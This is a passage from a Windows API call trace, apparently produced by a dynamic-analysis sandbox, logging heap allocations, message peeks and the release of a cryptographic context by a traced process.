hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.471] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.471] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.472] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0099.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0099.472] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0099.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.473] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0099.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.474] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0099.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0099.474] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0099.474] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0099.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0099.475] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0099.476] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0099.476] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0099.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0099.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0099.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0099.479] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.479] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0099.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0099.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.481] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0099.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", 